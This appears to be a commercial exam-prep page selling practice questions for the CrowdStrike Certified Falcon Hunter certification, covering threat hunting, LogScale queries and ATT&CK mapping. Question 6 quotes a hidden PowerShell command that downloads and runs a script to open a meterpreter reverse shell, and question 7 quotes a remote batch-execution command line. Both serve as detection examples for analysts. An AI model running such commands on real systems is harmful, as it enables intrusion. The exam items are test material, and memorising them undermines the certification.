Spring Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: pass65

CCFH-202b CrowdStrike Certified Falcon Hunter Questions and Answers

Questions 4

An attacker created a scheduled task which executes a remote management application. Which MITRE ATT & CK Matrix for Enterprise stage is this an example of?

Options:

A.

Persistence

B.

Lateral Movement

C.

Privilege Escalation

D.

Gaining Access

Buy Now
Questions 5

Your organization has identified a malicious Scheduled task that executes every 5 minutes. Which LogScale event search function can be used to quickly identify and display the unique hosts affected by the malware?

Options:

A.

stats

B.

table()

C.

groupBy()

D.

uniq

Buy Now
Questions 6

You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:

powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force

What is this command doing?

Options:

A.

Using PowerShell to perform a discovery scan of 172.17.0.21 on port 8080

B.

Utilizing PowerShell to force a connection to a reverse shell originating from GitHub

C.

Utilizing PowerShell to download a reverse shell from GitHub and executing it to create a connection

D.

Using WMI to update the PowerShell execution policy on a remote host

Buy Now
Questions 7

You receive a detection with the following command line:

C:\Windows\system32\cmd.exe /Q /c echo ping -n 1 google.com > \\VICTIM-MACHINE\C$\_______________output 2 > & 1 > C:\Windows\pJYOrvQB.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\pJYOrvQB.bat & del C:\Windows\pJYOrvQB.bat

What describes the activity observed?

Options:

A.

Administrator setting default DNS resolver for google.com via a .bat script

B.

Impacket tooling testing network connectivity on host as a part of reconnaissance activity

C.

Administrator testing network activity via connectivity of .bat script to ping google.com

D.

Impacket tooling executing Mimikatz attack via a .bat script as a part of privilege escalation activity

Buy Now
Questions 8

You suspect one of your endpoint host systems may have a vulnerable BIOS version. Which Investigate Dashboard will confirm vulnerability information such as the type and timeline?

Options:

A.

BIOS Prevalence

B.

BIOS Analysis

C.

BIOS Search

D.

BIOS Firmware Inventory

Buy Now
Questions 9

Refer to the image. Which query will show file execution from a suspicious directory across all hosts?

Options:

A.

#event_simpleName=ProcessRollup2 | aid=* | ImageFileName=/\\Users\\[^\\]+\\Desktop\\/i | groupBy(aid, function=collect([SHA256HashData, ImageFileName] ), limit-max)

B.

#event_simpleName=ProcessRollup2 | aid=c28082797f7f4d81b3f869dbaf6eb712 | ImageFileName=/\$Recycle\.Bin/i | groupBy(aid, function=collect([SHA256HashData, ImageFileName]), limit-max)

C.

#event_simpleName=ProcessRollup2 | aid=* | ImageFileName=/\$Recycle\.Bin/i | groupBy(aid, function=collect([SHA256HashData, ImageFileName]), limit-max)

D.

#event_simpleName=ProcessRollup2 | aid=* | ImageFileName=/\\Users\\[^\\]+\\Downloads\\/i | groupBy(aid, function=collect([SHA256HashData, ImageFileName] ), limit-max)

Buy Now
Questions 10

When will the ContextProcessId be the same value as the TargetProcessId?

Options:

A.

When a process spawns a child process, the child process ID matches the TargetProcessId and the ContextProcessId of the parent

B.

When a process spawns a child process, the ContextProcessId of the child will match the TargetProcessId of the parent

C.

When a process is suspended, the TargetProcessId will match the ContextProcessId

D.

When a process terminates, the ContextProcessId will match the TargetProcessId

Buy Now
Questions 11

You get a detection for a malicious PowerShell script with the process flow below:

Unknown Process - > chrome.exe - > wscript.exe - > powershell.exe Which process should you investigate further to identify the source of the script?

Options:

A.

chrome.exe

B.

wscript.exe

C.

Unknown Process

D.

powershell.exe

Buy Now
Questions 12

According to the MITRE ATT & CK Framework, if an adversary is trying to Gain Access by Credential Access via OS Credential Dumping, what is the specific attacker's technique that you can also use as a filter on the detections page to find similar activities?

Options:

A.

Gain Access

B.

OS Credential Dumping

C.

Credential Access

D.

Lateral Movement

Buy Now
Questions 13

You suspect that a user is abusing their admin privileges and you want to see the recent commands they have been utilizing. Which Investigate search will identify this?

Options:

A.

Host Search

B.

Process timeline

C.

User Search

D.

Process Context

Buy Now
Questions 14

Which is a normal parent of cmd.exe on Windows?

Options:

A.

explorer.exe

B.

userinit.exe

C.

svchost.exe

D.

winlogon.exe

Buy Now
Questions 15

You've experienced a ransomware infection that has spread throughout the enterprise. What is the first step you would take to determine the source of infection?

Options:

A.

Perform a PowerShell hunt to look for suspicious PowerShell commands

B.

Use Advanced Event Search to timeline encryption activity and determine the system with the first encryption event

C.

Utilize Exposure Management to identify systems with critical vulnerabilities that could be exploited

D.

Perform reverse engineering on the malware sample to see if you can find the infection vector

Buy Now
Questions 16

You identify an instance of a user in your environment utilizing a Cloudflared tunnel daemon, resulting in unusual command line activity. What steps would you take to determine if the unusual activity is malicious or legitimate?

Options:

A.

Block all instances of Cloudflared in your environment and perform a forensic investigation into the host

B.

Create a forensic image of the hard drive and analyze it for indicators of compromise

C.

Immediately network contain the host and perform a forensic investigation into the host

D.

Review the specific commands associated and compare them with known legitimate use cases to confirm if patterns align with normal operations

Buy Now
Questions 17

Which CQL query would output relevant data in tracking USB storage device usage?

Options:

A.

#event_simpleName=RemovableMediaVolumeMounted | table([@timestamp, ComputerName, VolumeDriveLetter, VolumeFileSystemDevice, VolumeFileSystemDriver])

B.

#event_simpleName=RemovableMediaVolumeMounted | table([RemoteAddressIP4, UserName, ParentProcessId, RawProcessId, TargetProcessId, FileName, MD5HashData, SHA256HashData, aid, cid])

C.

#event_simpleName=ProcessRollup2 event_platform=Win | table(["Host Name", "Connection Type", "Manufacturer", "Product Name", "Description", "Device ID", Time])

D.

#event_simpleName=FsVolumeMounted | table([@source, ComputerName, VolumeName, VolumeFileSystemType, Entitlements, VolumeDriveLetter])

Buy Now
Questions 18

Falcon Machine Learning has prevented and quarantined a file being written to disk that has VSCode as a parent process. This file was compiled by the system owner. What should the next steps be?

Options:

A.

Detonate the file in a private sandbox, and write a Machine Learning exclusion if the file activity is expected

B.

Search for the file hash in VirusTotal, and write a Sensor Visibility Exclusion

C.

Detonate the file in a private sandbox, and write an exclusion for the Indicator of Attack (IOA) if the file activity is expected

D.

Immediately network contain the host as VSCode is frequently used for malicious tunneling

Buy Now
Exam Code: CCFH-202b
Exam Name: CrowdStrike Certified Falcon Hunter
Last Update: Mar 24, 2026
Questions: 60

PDF + Testing Engine

$63.52  $181.49

Testing Engine

$50.57  $144.49
buy now CCFH-202b testing engine

PDF (Q&A)

$43.57  $124.49
buy now CCFH-202b pdf